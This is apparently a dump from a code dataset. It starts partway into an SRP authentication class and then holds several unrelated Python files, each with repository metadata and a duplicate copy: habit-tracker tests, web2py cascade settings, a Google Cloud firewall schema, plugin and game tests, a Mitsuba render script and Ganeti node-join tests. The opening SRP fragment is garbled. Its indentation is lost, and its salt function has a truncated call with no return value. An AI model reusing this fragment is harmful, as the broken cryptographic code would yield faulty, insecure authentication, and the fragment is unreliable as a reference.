tmp = int.from_bytes(M, "big")
else:
tmp = M
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.A))
hash_instance.update(Srp.to_byte_array(self.get_proof()))
hash_instance.update(Srp.to_byte_array(self.get_session_key()))
return tmp == int.from_bytes(hash_instance.digest(), "big")
class SrpServer(Srp):
def __init__(self, username, password):
Srp.__init__(self)
self.username = username
self.salt = SrpServer._create_salt()
self.password = password
self.verifier = self._get_verifier()
self.b = self.generate_private_key()
k = self._calculate_k()
g_b = pow(self.g, self.b, self.n)
self.B = (k * self.verifier + g_b) % self.n
self.A = None
@staticmethod
def _create_salt() -> int:
t.from_bytes(os.urandom(16), byteorder="big")
def _get_verifier(self) -> int:
hash_value = self._calculate_x()
v = pow(self.g, hash_value, self.n)
return v
def set_client_public_key(self, A):
self.A = A
def get_salt(self):
return self.salt
def get_public_key(self):
k = self._calculate_k()
return (k * self.verifier + pow(self.g, self.b, self.n)) % self.n
def get_shared_secret(self):
if self.A is None:
raise RuntimeError('Client\'s public key is missing')
tmp1 = self.A * pow(self.verifier, self._calculate_u(), self.n)
return pow(tmp1, self.b, self.n)
def verify_clients_proof(self, m) -> bool:
if self.B is None:
raise RuntimeError('Server\'s public key is missing')
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.n))
hN = bytearray(hash_instance.digest())
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.g))
hg = bytearray(hash_instance.digest())
for index in range(0, len(hN)):
hN[index] ^= hg[index]
u = self.username.encode()
hash_instance = self.h()
hash_instance.update(u)
hu = hash_instance.digest()
K = Srp.to_byte_array(self.get_session_key())
hash_instance = self.h()
hash_instance.update(hN)
hash_instance.update(hu)
hash_instance.update(Srp.to_byte_array(self.salt))
hash_instance.update(Srp.to_byte_array(self.A))
hash_instance.update(Srp.to_byte_array(self.B))
hash_instance.update(K)
return m == int.from_bytes(hash_instance.digest(), "big")
def get_proof(self, m) -> int:
hash_instance = self.h()
hash_instance.update(Srp.to_byte_array(self.A))
hash_instance.update(Srp.to_byte_array(m))
hash_instance.update(Srp.to_byte_array(self.get_session_key()))
return int.from_bytes(hash_instance.digest(), "big")
| true | true |
7901167d2ca689ba70d52528428e33fd1272f67e | 974 | py | Python | tests/func/test_complete_habit.py | takavarasha-desire/habittracker1_1 | 392034a0d67f2be0e8e34648614fc90c851d9f51 | [
"MIT"
] | null | null | null | tests/func/test_complete_habit.py | takavarasha-desire/habittracker1_1 | 392034a0d67f2be0e8e34648614fc90c851d9f51 | [
"MIT"
] | null | null | null | tests/func/test_complete_habit.py | takavarasha-desire/habittracker1_1 | 392034a0d67f2be0e8e34648614fc90c851d9f51 | [
"MIT"
] | null | null | null | from habit.habit_model import HabitHistory
from habit.complete_habit import complete
def test_overdue_habit(datasett):
"""
please note the 'double tt' for datasett. This stands to differentiate
the functional test data from the data used for unit tests.
habit 1 is the overdue habit since its added first in the func/conftest
module.
:param datasett: from func/conftest
:return:
"""
session = datasett
complete(1, session)
result = session.query(HabitHistory.broken_count).\
filter(HabitHistory.habitid == 1).all()
assert result == [(1,)]
def test_a_habit_due_for_completion(datasett):
"""
habit 2 is the due habit since its added second in the func/conftest
module.
:param datasett: from func/conftest
:return:
"""
session = datasett
complete(2, session)
result = session.query(HabitHistory.streak).\
filter(HabitHistory.habitid == 2).all()
assert result == [(1,)]
| 29.515152 | 75 | 0.687885 | from habit.habit_model import HabitHistory
from habit.complete_habit import complete
def test_overdue_habit(datasett):
session = datasett
complete(1, session)
result = session.query(HabitHistory.broken_count).\
filter(HabitHistory.habitid == 1).all()
assert result == [(1,)]
def test_a_habit_due_for_completion(datasett):
session = datasett
complete(2, session)
result = session.query(HabitHistory.streak).\
filter(HabitHistory.habitid == 2).all()
assert result == [(1,)]
| true | true |
7901180465af174a6f023be20b48204d2d1b8ffa | 501 | py | Python | web2py-appliances-master/HotelManagementExample/models/db_wizard_ondelete.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | web2py-appliances-master/HotelManagementExample/models/db_wizard_ondelete.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | web2py-appliances-master/HotelManagementExample/models/db_wizard_ondelete.py | wantsomechocolate/WantsomeBeanstalk | 8c8a0a80490d04ea52661a3114fd3db8de65a01e | [
"BSD-3-Clause"
] | null | null | null | db.blog_category.ondelete = 'CASCADE'
db.blog.ondelete = 'CASCADE'
db.branch_rating.ondelete = 'CASCADE'
db.branch.ondelete = 'CASCADE'
db.floor.ondelete = 'CASCADE'
db.guest.ondelete = 'CASCADE'
db.news_category.ondelete = 'CASCADE'
db.news.ondelete = 'CASCADE'
db.photo_album.ondelete = 'CASCADE'
db.photo.ondelete = 'CASCADE'
db.room_category.ondelete = 'CASCADE'
db.room_status.ondelete = 'CASCADE'
db.room.ondelete = 'CASCADE'
db.video_category.ondelete = 'CASCADE'
db.video.ondelete = 'CASCADE'
| 31.3125 | 38 | 0.760479 | db.blog_category.ondelete = 'CASCADE'
db.blog.ondelete = 'CASCADE'
db.branch_rating.ondelete = 'CASCADE'
db.branch.ondelete = 'CASCADE'
db.floor.ondelete = 'CASCADE'
db.guest.ondelete = 'CASCADE'
db.news_category.ondelete = 'CASCADE'
db.news.ondelete = 'CASCADE'
db.photo_album.ondelete = 'CASCADE'
db.photo.ondelete = 'CASCADE'
db.room_category.ondelete = 'CASCADE'
db.room_status.ondelete = 'CASCADE'
db.room.ondelete = 'CASCADE'
db.video_category.ondelete = 'CASCADE'
db.video.ondelete = 'CASCADE'
| true | true |
790118528e39ec848ce42b7e3d980e96710d9c87 | 4,047 | py | Python | google_cloud_compute/komand_google_cloud_compute/actions/get_firewall/schema.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | google_cloud_compute/komand_google_cloud_compute/actions/get_firewall/schema.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | google_cloud_compute/komand_google_cloud_compute/actions/get_firewall/schema.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | null | null | null | # GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Input:
FIREWALL = "firewall"
class Output:
ALLOWED = "allowed"
CREATIONTIMESTAMP = "creationTimestamp"
DESCRIPTION = "description"
ID = "id"
KIND = "kind"
NAME = "name"
NETWORK = "network"
SELFLINK = "selfLink"
SOURCERANGES = "sourceRanges"
SOURCETAGS = "sourceTags"
TARGETTAGS = "targetTags"
class GetFirewallInput(komand.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"firewall": {
"type": "string",
"title": "Firewall Name",
"description": "Name of the firewall rule to return",
"order": 1
}
},
"required": [
"firewall"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class GetFirewallOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"allowed": {
"type": "array",
"title": "Allowed",
"description": "The list of allow rules specified by this firewall. Each rule specifies a protocol and port-range tuple that describes a permitted connection",
"items": {
"$ref": "#/definitions/allowed"
},
"order": 10
},
"creationTimestamp": {
"type": "string",
"title": "Creation Timestamp",
"description": "Creation timestamp",
"order": 11
},
"description": {
"type": "string",
"title": "Description",
"description": "A textual description of the operation, which is set when the operation is created",
"order": 5
},
"id": {
"type": "string",
"title": "ID",
"description": "The unique identifier for the resource. This identifier is defined by the server",
"order": 1
},
"kind": {
"type": "string",
"title": "Kind",
"description": "Type of the resource. Always compute#firewall for firewall rules",
"order": 2
},
"name": {
"type": "string",
"title": "Name",
"description": "Name of the resource, provided by the client when the resource is created",
"order": 3
},
"network": {
"type": "string",
"title": "Network",
"description": "URL of the network resource for this firewall rule. If not specified when creating a firewall rule, the default network is used: global/networks/default",
"order": 6
},
"selfLink": {
"type": "string",
"title": "Self Link",
"description": "Server-defined url for the resource",
"order": 4
},
"sourceRanges": {
"type": "array",
"title": "Source Ranges",
"description": "If source ranges are specified, the firewall will apply only to traffic that has source ip address in these ranges",
"items": {
"type": "string"
},
"order": 8
},
"sourceTags": {
"type": "array",
"title": "Source Tags",
"description": "If source tags are specified, the firewall will apply only to traffic with source ip that belongs to a tag listed in source tags",
"items": {
"type": "string"
},
"order": 7
},
"targetTags": {
"type": "array",
"title": "Target Tags",
"description": "A list of instance tags indicating sets of instances located in the network that may make network connections as specified in allowed[]",
"items": {
"type": "string"
},
"order": 9
}
},
"definitions": {
"allowed": {
"type": "object",
"title": "allowed",
"properties": {
"IPProtocol": {
"type": "string",
"title": "IPProtocol",
"order": 1
},
"ports": {
"type": "array",
"title": "Ports",
"items": {
"type": "string"
},
"order": 2
}
}
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
| 25.613924 | 176 | 0.551767 |
import komand
import json
class Input:
FIREWALL = "firewall"
class Output:
ALLOWED = "allowed"
CREATIONTIMESTAMP = "creationTimestamp"
DESCRIPTION = "description"
ID = "id"
KIND = "kind"
NAME = "name"
NETWORK = "network"
SELFLINK = "selfLink"
SOURCERANGES = "sourceRanges"
SOURCETAGS = "sourceTags"
TARGETTAGS = "targetTags"
class GetFirewallInput(komand.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"firewall": {
"type": "string",
"title": "Firewall Name",
"description": "Name of the firewall rule to return",
"order": 1
}
},
"required": [
"firewall"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class GetFirewallOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"allowed": {
"type": "array",
"title": "Allowed",
"description": "The list of allow rules specified by this firewall. Each rule specifies a protocol and port-range tuple that describes a permitted connection",
"items": {
"$ref": "#/definitions/allowed"
},
"order": 10
},
"creationTimestamp": {
"type": "string",
"title": "Creation Timestamp",
"description": "Creation timestamp",
"order": 11
},
"description": {
"type": "string",
"title": "Description",
"description": "A textual description of the operation, which is set when the operation is created",
"order": 5
},
"id": {
"type": "string",
"title": "ID",
"description": "The unique identifier for the resource. This identifier is defined by the server",
"order": 1
},
"kind": {
"type": "string",
"title": "Kind",
"description": "Type of the resource. Always compute#firewall for firewall rules",
"order": 2
},
"name": {
"type": "string",
"title": "Name",
"description": "Name of the resource, provided by the client when the resource is created",
"order": 3
},
"network": {
"type": "string",
"title": "Network",
"description": "URL of the network resource for this firewall rule. If not specified when creating a firewall rule, the default network is used: global/networks/default",
"order": 6
},
"selfLink": {
"type": "string",
"title": "Self Link",
"description": "Server-defined url for the resource",
"order": 4
},
"sourceRanges": {
"type": "array",
"title": "Source Ranges",
"description": "If source ranges are specified, the firewall will apply only to traffic that has source ip address in these ranges",
"items": {
"type": "string"
},
"order": 8
},
"sourceTags": {
"type": "array",
"title": "Source Tags",
"description": "If source tags are specified, the firewall will apply only to traffic with source ip that belongs to a tag listed in source tags",
"items": {
"type": "string"
},
"order": 7
},
"targetTags": {
"type": "array",
"title": "Target Tags",
"description": "A list of instance tags indicating sets of instances located in the network that may make network connections as specified in allowed[]",
"items": {
"type": "string"
},
"order": 9
}
},
"definitions": {
"allowed": {
"type": "object",
"title": "allowed",
"properties": {
"IPProtocol": {
"type": "string",
"title": "IPProtocol",
"order": 1
},
"ports": {
"type": "array",
"title": "Ports",
"items": {
"type": "string"
},
"order": 2
}
}
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
| true | true |
79011899d68bbfec0c449ad74ae5d06590f58e14 | 4,131 | py | Python | yaz/test/test_task_configuration.py | boudewijn-zicht/yaz | 48c842fe053bf9cd6446c4b33fb081c65339aa48 | [
"MIT"
] | 2 | 2017-03-09T15:44:10.000Z | 2017-03-15T17:51:24.000Z | yaz/test/test_task_configuration.py | yaz/yaz | 48c842fe053bf9cd6446c4b33fb081c65339aa48 | [
"MIT"
] | 9 | 2017-03-10T12:54:12.000Z | 2017-04-02T08:01:41.000Z | yaz/test/test_task_configuration.py | boudewijn-zicht/yaz | 48c842fe053bf9cd6446c4b33fb081c65339aa48 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import io
import unittest.mock
import yaz
class ConfigurationPlugin(yaz.Plugin):
"""This is the documentation string for the ConfigurationPlugin"""
choices = {
"yes": True,
"no": False,
"unknown": None,
}
@yaz.task(choice__choices=["yes", "no", "unknown"])
def required_choice(self, choice):
"""This is the documentation for the required_choice task"""
return self.choices[choice]
@yaz.task
def one_line_doc_string(self):
"""This is the documentation for the one_line_doc_string task"""
pass
@yaz.task
def multi_line_doc_string(self):
"""
This is the documentation for the multi_line_doc_string task
This is the long description, for example:
bla bla,
etc...
"""
pass
@yaz.task(choice__help="This is the documentation for the choice parameter of the parameter_help task")
def parameter_help(self, choice):
"""This is the documentation for the parameter_help task"""
pass
class Test(yaz.TestCase):
def test_010_plugin_help(self):
"""Should show plugin help texts from docstring or configuration"""
caller = self.get_caller([ConfigurationPlugin])
with unittest.mock.patch("sys.stdout", new=io.StringIO()) as stdout:
with self.assertRaises(SystemExit):
caller("--help")
stdout.seek(0)
output = stdout.read()
print(output)
self.assertRegex(output, r"This is the documentation string for the ConfigurationPlugin")
self.assertRegex(output, r"This is the documentation for the required_choice task")
self.assertRegex(output, r"This is the documentation for the one_line_doc_string task")
self.assertRegex(output, r"This is the documentation for the parameter_help task")
# we expect the first line of the the multi_line_doc_string task, not the rest
self.assertRegex(output, r"This is the documentation for the multi_line_doc_string task")
self.assertNotRegex(output, r"This is the long description, for example")
def test_020_task_help__docstring(self):
"""Should show task help texts from docstring or configuration"""
caller = self.get_caller([ConfigurationPlugin])
with unittest.mock.patch("sys.stdout", new=io.StringIO()) as stdout:
with self.assertRaises(SystemExit):
caller("multi-line-doc-string", "--help")
stdout.seek(0)
output = stdout.read()
print(output)
self.assertNotRegex(output, r"This is the documentation string for the ConfigurationPlugin")
self.assertRegex(output, r"This is the documentation for the multi_line_doc_string task")
self.assertRegex(output, r"This is the long description, for example")
def test_030_task_help__parameter(self):
"""Should show task help texts from docstring or configuration"""
caller = self.get_caller([ConfigurationPlugin])
with unittest.mock.patch("sys.stdout", new=io.StringIO()) as stdout:
with self.assertRaises(SystemExit):
caller("parameter-help", "--help")
stdout.seek(0)
output = stdout.read()
print(output)
self.assertNotRegex(output, r"This is the documentation string for the ConfigurationPlugin")
self.assertRegex(output, r"This is the documentation for the parameter_help task")
self.assertRegex(output, r"This is the documentation for the choice parameter of the\n.*parameter_help task")
def test_040_choices_configuration(self):
"""Should accept predefined choices"""
caller = self.get_caller([ConfigurationPlugin])
# using available choice
self.assertTrue(caller("required-choice", "yes"))
# using unavailable choice
with unittest.mock.patch("sys.stderr", new=io.StringIO()):
with self.assertRaises(SystemExit):
caller("required-choice", "unavailable")
if __name__ == "__main__":
yaz.main()
| 35.612069 | 117 | 0.661825 |
import io
import unittest.mock
import yaz
class ConfigurationPlugin(yaz.Plugin):
choices = {
"yes": True,
"no": False,
"unknown": None,
}
@yaz.task(choice__choices=["yes", "no", "unknown"])
def required_choice(self, choice):
return self.choices[choice]
@yaz.task
def one_line_doc_string(self):
pass
@yaz.task
def multi_line_doc_string(self):
pass
@yaz.task(choice__help="This is the documentation for the choice parameter of the parameter_help task")
def parameter_help(self, choice):
pass
class Test(yaz.TestCase):
def test_010_plugin_help(self):
caller = self.get_caller([ConfigurationPlugin])
with unittest.mock.patch("sys.stdout", new=io.StringIO()) as stdout:
with self.assertRaises(SystemExit):
caller("--help")
stdout.seek(0)
output = stdout.read()
print(output)
self.assertRegex(output, r"This is the documentation string for the ConfigurationPlugin")
self.assertRegex(output, r"This is the documentation for the required_choice task")
self.assertRegex(output, r"This is the documentation for the one_line_doc_string task")
self.assertRegex(output, r"This is the documentation for the parameter_help task")
self.assertRegex(output, r"This is the documentation for the multi_line_doc_string task")
self.assertNotRegex(output, r"This is the long description, for example")
def test_020_task_help__docstring(self):
caller = self.get_caller([ConfigurationPlugin])
with unittest.mock.patch("sys.stdout", new=io.StringIO()) as stdout:
with self.assertRaises(SystemExit):
caller("multi-line-doc-string", "--help")
stdout.seek(0)
output = stdout.read()
print(output)
self.assertNotRegex(output, r"This is the documentation string for the ConfigurationPlugin")
self.assertRegex(output, r"This is the documentation for the multi_line_doc_string task")
self.assertRegex(output, r"This is the long description, for example")
def test_030_task_help__parameter(self):
caller = self.get_caller([ConfigurationPlugin])
with unittest.mock.patch("sys.stdout", new=io.StringIO()) as stdout:
with self.assertRaises(SystemExit):
caller("parameter-help", "--help")
stdout.seek(0)
output = stdout.read()
print(output)
self.assertNotRegex(output, r"This is the documentation string for the ConfigurationPlugin")
self.assertRegex(output, r"This is the documentation for the parameter_help task")
self.assertRegex(output, r"This is the documentation for the choice parameter of the\n.*parameter_help task")
def test_040_choices_configuration(self):
caller = self.get_caller([ConfigurationPlugin])
self.assertTrue(caller("required-choice", "yes"))
with unittest.mock.patch("sys.stderr", new=io.StringIO()):
with self.assertRaises(SystemExit):
caller("required-choice", "unavailable")
if __name__ == "__main__":
yaz.main()
| true | true |
790118e8bb809dc345959e6e808bc69e67393268 | 1,465 | py | Python | test/test_grid.py | gabrielbarker/snap | 14272297463d4a2272644dca0e7a33773cdb32d5 | [
"MIT"
] | null | null | null | test/test_grid.py | gabrielbarker/snap | 14272297463d4a2272644dca0e7a33773cdb32d5 | [
"MIT"
] | null | null | null | test/test_grid.py | gabrielbarker/snap | 14272297463d4a2272644dca0e7a33773cdb32d5 | [
"MIT"
] | null | null | null | import unittest
import io
import sys
import random
from unittest.mock import MagicMock, Mock, patch
from snap.grid import Grid
from snap.hand import Hand
from snap.card import Card
class TestGrid(unittest.TestCase):
def test__get__origin__returns_correct_cards(self):
random.seed(1)
expected_card = Card(7)
grid = Grid(3)
mock_position = self.get_mock_position(2, 1)
self.assertEqual(expected_card, grid.get(mock_position))
@patch.object(Hand, "hide_all")
def test__hide_all__calls_hide_all_on_hand(self, mock_hide_all):
height = 3
grid = Grid(height)
grid.hide_all()
mock_hide_all.assert_called()
self.assertEqual(height, len(mock_hide_all.call_args_list))
@patch.object(Hand, "strings")
def test__strings__returns_mock_strings(self, mock_strings_method):
mock_strings = ["line 1", "line 2"]
mock_strings_method.return_value = mock_strings
height = 3
grid = Grid(height)
strings = grid.strings()
mock_strings_method.assert_called()
self.assertEqual(height, len(mock_strings_method.call_args_list))
self.assertEqual(mock_strings * height, strings)
def get_mock_position(self, x, y):
pos = Mock()
pos.x.return_value = x
pos.y.return_value = y
return pos
def get_mock_hand(self):
hand = Mock()
hand.hide_all = MagicMock()
return hand | 31.170213 | 73 | 0.675085 | import unittest
import io
import sys
import random
from unittest.mock import MagicMock, Mock, patch
from snap.grid import Grid
from snap.hand import Hand
from snap.card import Card
class TestGrid(unittest.TestCase):
def test__get__origin__returns_correct_cards(self):
random.seed(1)
expected_card = Card(7)
grid = Grid(3)
mock_position = self.get_mock_position(2, 1)
self.assertEqual(expected_card, grid.get(mock_position))
@patch.object(Hand, "hide_all")
def test__hide_all__calls_hide_all_on_hand(self, mock_hide_all):
height = 3
grid = Grid(height)
grid.hide_all()
mock_hide_all.assert_called()
self.assertEqual(height, len(mock_hide_all.call_args_list))
@patch.object(Hand, "strings")
def test__strings__returns_mock_strings(self, mock_strings_method):
mock_strings = ["line 1", "line 2"]
mock_strings_method.return_value = mock_strings
height = 3
grid = Grid(height)
strings = grid.strings()
mock_strings_method.assert_called()
self.assertEqual(height, len(mock_strings_method.call_args_list))
self.assertEqual(mock_strings * height, strings)
def get_mock_position(self, x, y):
pos = Mock()
pos.x.return_value = x
pos.y.return_value = y
return pos
def get_mock_hand(self):
hand = Mock()
hand.hide_all = MagicMock()
return hand | true | true |
7901194eba875695bcdb1f6dc9753cda74759756 | 3,426 | py | Python | tools/render.py | fanbeatsman/interactive-viewer | b2561b394656fcfd125611553ab56efd3beae0f2 | [
"MIT"
] | 20 | 2019-06-22T17:02:48.000Z | 2022-03-10T05:29:45.000Z | tools/render.py | fanbeatsman/interactive-viewer | b2561b394656fcfd125611553ab56efd3beae0f2 | [
"MIT"
] | 2 | 2019-06-24T15:12:34.000Z | 2019-06-25T16:52:14.000Z | tools/render.py | fanbeatsman/interactive-viewer | b2561b394656fcfd125611553ab56efd3beae0f2 | [
"MIT"
] | 5 | 2019-07-01T20:15:49.000Z | 2021-04-08T13:58:00.000Z | from __future__ import print_function
"""
A script to batch render and update interactive viewer.
"""
import os
import sys
import argparse
import pyexr
import numpy as np
import json
import subprocess as sp
from analyze import update_stats, compute_stats, write_data
if __name__ == '__main__':
# Parse arguments
parser = argparse.ArgumentParser(
description='Batch analysis of rendered images.')
parser.add_argument('-mts', '--mitsuba',
help='mitsuba executable', type=str, default='./mitsuba')
parser.add_argument('-r', '--ref',
help='reference image', type=str, required=True)
parser.add_argument('-s', '--scene',
help='scene xml file', type=str, required=True)
parser.add_argument('-o', '--options',
help='mitsuba options', type=str)
parser.add_argument('-d', '--dir',
help='corresponding viewer scene directory', type=str, required=True)
parser.add_argument('-n', '--name',
help='algorithm name', type=str, required=True)
parser.add_argument('-a', '--alg',
help='mitsuba algorithm keyword', type=str, required=True)
parser.add_argument('-t', '--timeout',
help='render time (s)', type=int)
parser.add_argument('-f', '--frequency',
help='intermediate image output frequency (s)', type=int)
parser.add_argument('-m', '--metrics',
help='difference metrics', nargs='+', choices=['l1', 'l2', 'mrse', 'mape', 'smape', 'dssim'], type=str)
parser.add_argument('-eps', '--epsilon',
help='epsilon value', type=float, default=1e-2)
parser.add_argument('-c', '--clip',
help='clipping values for min/max', nargs=2, type=float, default=[0, 1])
args = parser.parse_args()
# Create Mistuba command
fname = '{}.exr'.format(args.name.replace(' ', '-'))
out_path = os.path.join(os.path.dirname(args.scene), fname)
render = '{} {} -D integrator={}'.format(
args.mitsuba, args.scene, args.alg)
if args.frequency:
render = '{} -r {}'.format(render, args.frequency)
if args.options:
render = '{} {}'.format(render, args.options)
render = '{} -o {}'.format(render, out_path)
cmd = render.split()
# Run and time out after fixed amount of time
sys.stdout.write('Rendering... ')
sys.stdout.flush()
try:
out = sp.check_output(cmd, shell=False, timeout=args.timeout)
except sp.TimeoutExpired as e:
print('done.')
# Update interactive viewer
sys.stdout.write('Recomputing metrics... ')
sys.stdout.flush()
ref_fp = pyexr.open(args.ref)
ref = np.array(ref_fp.get())
img_fp = pyexr.open(out_path)
img = np.array(img_fp.get())
test = [{'name': args.name, 'data': img}]
with open(os.path.join(args.dir, 'data.json'), 'r') as fp:
data = json.load(fp)
with open(os.path.join(args.dir, 'stats.json'), 'r') as fp:
stats = json.load(fp)
data = update_stats(args.dir, data, ref, test,
args.metrics, args.clip, args.epsilon)
write_data(args.dir, data)
print('done.')
web_url = os.path.abspath(os.path.join(args.dir, 'index.html'))
print('Interactive viewer updated: {}'.format(web_url))
| 38.931818 | 127 | 0.590193 | from __future__ import print_function
import os
import sys
import argparse
import pyexr
import numpy as np
import json
import subprocess as sp
from analyze import update_stats, compute_stats, write_data
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Batch analysis of rendered images.')
parser.add_argument('-mts', '--mitsuba',
help='mitsuba executable', type=str, default='./mitsuba')
parser.add_argument('-r', '--ref',
help='reference image', type=str, required=True)
parser.add_argument('-s', '--scene',
help='scene xml file', type=str, required=True)
parser.add_argument('-o', '--options',
help='mitsuba options', type=str)
parser.add_argument('-d', '--dir',
help='corresponding viewer scene directory', type=str, required=True)
parser.add_argument('-n', '--name',
help='algorithm name', type=str, required=True)
parser.add_argument('-a', '--alg',
help='mitsuba algorithm keyword', type=str, required=True)
parser.add_argument('-t', '--timeout',
help='render time (s)', type=int)
parser.add_argument('-f', '--frequency',
help='intermediate image output frequency (s)', type=int)
parser.add_argument('-m', '--metrics',
help='difference metrics', nargs='+', choices=['l1', 'l2', 'mrse', 'mape', 'smape', 'dssim'], type=str)
parser.add_argument('-eps', '--epsilon',
help='epsilon value', type=float, default=1e-2)
parser.add_argument('-c', '--clip',
help='clipping values for min/max', nargs=2, type=float, default=[0, 1])
args = parser.parse_args()
fname = '{}.exr'.format(args.name.replace(' ', '-'))
out_path = os.path.join(os.path.dirname(args.scene), fname)
render = '{} {} -D integrator={}'.format(
args.mitsuba, args.scene, args.alg)
if args.frequency:
render = '{} -r {}'.format(render, args.frequency)
if args.options:
render = '{} {}'.format(render, args.options)
render = '{} -o {}'.format(render, out_path)
cmd = render.split()
sys.stdout.write('Rendering... ')
sys.stdout.flush()
try:
out = sp.check_output(cmd, shell=False, timeout=args.timeout)
except sp.TimeoutExpired as e:
print('done.')
sys.stdout.write('Recomputing metrics... ')
sys.stdout.flush()
ref_fp = pyexr.open(args.ref)
ref = np.array(ref_fp.get())
img_fp = pyexr.open(out_path)
img = np.array(img_fp.get())
test = [{'name': args.name, 'data': img}]
with open(os.path.join(args.dir, 'data.json'), 'r') as fp:
data = json.load(fp)
with open(os.path.join(args.dir, 'stats.json'), 'r') as fp:
stats = json.load(fp)
data = update_stats(args.dir, data, ref, test,
args.metrics, args.clip, args.epsilon)
write_data(args.dir, data)
print('done.')
web_url = os.path.abspath(os.path.join(args.dir, 'index.html'))
print('Interactive viewer updated: {}'.format(web_url))
| true | true |
7901199bf253ffa0258b22098bef2a7b600f551f | 8,681 | py | Python | test/py/ganeti.tools.prepare_node_join_unittest.py | regnauld/ganeti | c1d88461a964a5d0d89cd1ba0571429e01f0a1b5 | [
"BSD-2-Clause"
] | 2 | 2018-09-26T10:09:23.000Z | 2018-09-27T07:27:06.000Z | test/py/ganeti.tools.prepare_node_join_unittest.py | regnauld/ganeti | c1d88461a964a5d0d89cd1ba0571429e01f0a1b5 | [
"BSD-2-Clause"
] | null | null | null | test/py/ganeti.tools.prepare_node_join_unittest.py | regnauld/ganeti | c1d88461a964a5d0d89cd1ba0571429e01f0a1b5 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/python
#
# Copyright (C) 2012 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for testing ganeti.tools.prepare_node_join"""
import unittest
import shutil
import tempfile
import os.path
from ganeti import errors
from ganeti import constants
from ganeti import pathutils
from ganeti import compat
from ganeti import utils
from ganeti.tools import prepare_node_join
from ganeti.tools import common
import testutils
_JoinError = prepare_node_join.JoinError
_DATA_CHECK = prepare_node_join._DATA_CHECK
class TestVerifyCertificate(testutils.GanetiTestCase):
def setUp(self):
testutils.GanetiTestCase.setUp(self)
self.tmpdir = tempfile.mkdtemp()
def tearDown(self):
testutils.GanetiTestCase.tearDown(self)
shutil.rmtree(self.tmpdir)
def testNoCert(self):
common.VerifyCertificateSoft({}, error_fn=prepare_node_join.JoinError,
_verify_fn=NotImplemented)
def testGivenPrivateKey(self):
cert_filename = testutils.TestDataFilename("cert2.pem")
cert_pem = utils.ReadFile(cert_filename)
self.assertRaises(_JoinError, common._VerifyCertificateSoft,
cert_pem, _JoinError, _check_fn=NotImplemented)
def testInvalidCertificate(self):
self.assertRaises(errors.X509CertError,
common._VerifyCertificateSoft,
"Something that's not a certificate",
_JoinError, _check_fn=NotImplemented)
@staticmethod
def _Check(cert):
assert cert.get_subject()
def testSuccessfulCheck(self):
cert_filename = testutils.TestDataFilename("cert1.pem")
cert_pem = utils.ReadFile(cert_filename)
common._VerifyCertificateSoft(cert_pem, _JoinError,
_check_fn=self._Check)
class TestUpdateSshDaemon(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.tmpdir = tempfile.mkdtemp()
self.keyfiles = {
constants.SSHK_RSA:
(utils.PathJoin(self.tmpdir, "rsa.private"),
utils.PathJoin(self.tmpdir, "rsa.public")),
constants.SSHK_DSA:
(utils.PathJoin(self.tmpdir, "dsa.private"),
utils.PathJoin(self.tmpdir, "dsa.public")),
constants.SSHK_ECDSA:
(utils.PathJoin(self.tmpdir, "ecdsa.private"),
utils.PathJoin(self.tmpdir, "ecdsa.public")),
}
def tearDown(self):
unittest.TestCase.tearDown(self)
shutil.rmtree(self.tmpdir)
def testNoKeys(self):
data_empty_keys = {
constants.SSHS_SSH_HOST_KEY: [],
}
for data in [{}, data_empty_keys]:
for dry_run in [False, True]:
prepare_node_join.UpdateSshDaemon(data, dry_run,
_runcmd_fn=NotImplemented,
